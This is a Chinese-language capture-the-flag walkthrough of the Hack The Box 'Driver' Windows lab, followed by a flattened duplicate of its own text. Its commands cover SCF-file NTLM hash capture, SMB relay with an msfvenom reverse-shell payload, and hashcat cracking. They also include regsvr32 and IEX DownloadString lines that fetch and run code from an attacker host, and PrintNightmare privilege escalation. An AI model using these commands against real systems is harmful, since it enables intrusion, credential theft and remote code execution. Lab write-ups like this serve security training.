Hack The Box - Driver
字数 1185 2025-08-11 23:26:41

Hack The Box - Driver 靶机渗透教学文档

0x00 靶机概述

Driver 是 Hack The Box 平台上的一个 Windows 靶机,渗透过程涉及以下技术点:

  • SMB 中继攻击
  • SCF 文件攻击
  • WinRM 反弹 shell
  • 打印机服务提权漏洞利用

0x01 信息收集

初始扫描

使用 Nmap 进行初始扫描:

nmap -sC -sV -T4 --min-rate 1000 10.10.11.106

发现开放端口:

  • 445/tcp - SMB 服务
  • 其他 Web 服务端口

SMB 漏洞检测

检查 SMB 基本漏洞:

nmap -p 445 --script smb-vuln* 10.10.11.106

未发现已知漏洞

0x02 Web 应用分析

发现 Web 登录界面,使用弱口令成功登录:

  • 用户名:admin
  • 密码:admin

发现打印机固件升级功能,存在文件上传点:

  • 上传功能无限制
  • 无返回路径,无法直接利用

0x03 SCF 文件攻击

SCF 文件原理

SCF (Shell Command File) 文件可用于执行有限操作,特别是访问特定 UNC 路径,可用于构造攻击。

制作 SCF 文件

创建 @xxx.scf 文件(@符号使文件保持在共享列表顶端):

[Shell]
Command=2
IconFile=\\10.10.16.13\share\a.ico
[Taskbar]
Command=ToggleDesktop

捕获 NTLM Hash

两种捕获方法:

方法一:使用 Metasploit

use auxiliary/server/capture/smb
set相关参数
run

方法二:使用 Responder

responder -wrf --lm -v -I eth0
python2 Responder.py -wrf --lm -v -I tun0

0x04 SMB 中继攻击

生成后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=your_ip LPORT=5555 -f exe > shell.exe

使用 Impacket 的 smbrelayx

python smbrelayx.py -h Target-IP -e ./shell.exe

Metasploit 监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST your_ip
set LPORT 5555
run

注意:此方法需要受害者服务器具有管理员权限

0x05 破解 NTLMv2 Hash

将捕获的 Hash 写入文件:

echo "NTLMv2_Hash" > hash

使用 hashcat 破解:

hashcat -m 5600 hash --wordlist /usr/share/wordlists/rockyou.txt

0x06 WinRM 反弹 shell

使用 Evil-WinRM

gem install evil-winrm
evil-winrm -i 10.10.11.106 -u "tony" -p "liltony"

使用 MSF 的 web_delivery 模块上线

  1. 设置 web_delivery 模块
  2. 在 WinRM shell 中执行:
regsvr32 /s /n /u /i:http://10.10.16.13:8888/3Cni6iy5.sct scrobj.dll

0x07 提权

初步信息收集

  • 检查当前用户权限
  • 检查运行的服务

发现打印机服务漏洞

相关漏洞:

  • CVE-2021-34527
  • CVE-2021-1675

利用 CVE-2021-34527

  1. 远程加载 PowerShell 脚本:
IEX(New-Object Net.WebClient).DownloadString('http://10.10.16.13:8000/CVE-2021-34527.ps1')
  1. 执行攻击:
Invoke-Nightmare
  • 添加用户:adm1n
  • 密码:P@ssw0rd
  • 加入 Administrators 组

利用 CVE-2021-1675

  1. 远程加载 PowerShell 脚本:
IEX(New-Object Net.WebClient).DownloadString('http://10.10.16.13:8000/CVE-2021-1675.ps1')
  1. 执行攻击(自定义参数):
Invoke-Nightmare -DriverName "Chr1sto" -NewUser "chr1sto" -NewPassword "chr1sto"

0x08 获取 Flag

使用新创建的管理员账户通过 Evil-WinRM 登录:

evil-winrm -i 10.10.11.106 -u "adm1n" -p "P@ssw0rd"

读取 flag 文件。

0x09 总结

整个渗透流程:

  1. 信息收集发现 SMB 和 Web 服务
  2. 通过 Web 上传点实施 SCF 文件攻击
  3. 捕获 NTLM Hash 并破解
  4. 使用 WinRM 获取初始 shell
  5. 利用打印机服务漏洞提权
  6. 获取最终 flag

关键点:

  • SCF 文件攻击技巧
  • NTLM 中继攻击
  • 打印机服务提权漏洞利用
  • 多种方法获取系统权限
Hack The Box - Driver 靶机渗透教学文档 0x00 靶机概述 Driver 是 Hack The Box 平台上的一个 Windows 靶机,渗透过程涉及以下技术点: SMB 中继攻击 SCF 文件攻击 WinRM 反弹 shell 打印机服务提权漏洞利用 0x01 信息收集 初始扫描 使用 Nmap 进行初始扫描: 发现开放端口: 445/tcp - SMB 服务 其他 Web 服务端口 SMB 漏洞检测 检查 SMB 基本漏洞: 未发现已知漏洞 0x02 Web 应用分析 发现 Web 登录界面,使用弱口令成功登录: 用户名:admin 密码:admin 发现打印机固件升级功能,存在文件上传点: 上传功能无限制 无返回路径,无法直接利用 0x03 SCF 文件攻击 SCF 文件原理 SCF (Shell Command File) 文件可用于执行有限操作,特别是访问特定 UNC 路径,可用于构造攻击。 制作 SCF 文件 创建 @xxx.scf 文件(@符号使文件保持在共享列表顶端): 捕获 NTLM Hash 两种捕获方法: 方法一:使用 Metasploit 方法二:使用 Responder 0x04 SMB 中继攻击 生成后门 使用 Impacket 的 smbrelayx Metasploit 监听 注意:此方法需要受害者服务器具有管理员权限 0x05 破解 NTLMv2 Hash 将捕获的 Hash 写入文件: 使用 hashcat 破解: 0x06 WinRM 反弹 shell 使用 Evil-WinRM 使用 MSF 的 web_ delivery 模块上线 设置 web_ delivery 模块 在 WinRM shell 中执行: 0x07 提权 初步信息收集 检查当前用户权限 检查运行的服务 发现打印机服务漏洞 相关漏洞: CVE-2021-34527 CVE-2021-1675 利用 CVE-2021-34527 远程加载 PowerShell 脚本: 执行攻击: 添加用户:adm1n 密码:P@ssw0rd 加入 Administrators 组 利用 CVE-2021-1675 远程加载 PowerShell 脚本: 执行攻击(自定义参数): 0x08 获取 Flag 使用新创建的管理员账户通过 Evil-WinRM 登录: 读取 flag 文件。 0x09 总结 整个渗透流程: 信息收集发现 SMB 和 Web 服务 通过 Web 上传点实施 SCF 文件攻击 捕获 NTLM Hash 并破解 使用 WinRM 获取初始 shell 利用打印机服务漏洞提权 获取最终 flag 关键点: SCF 文件攻击技巧 NTLM 中继攻击 打印机服务提权漏洞利用 多种方法获取系统权限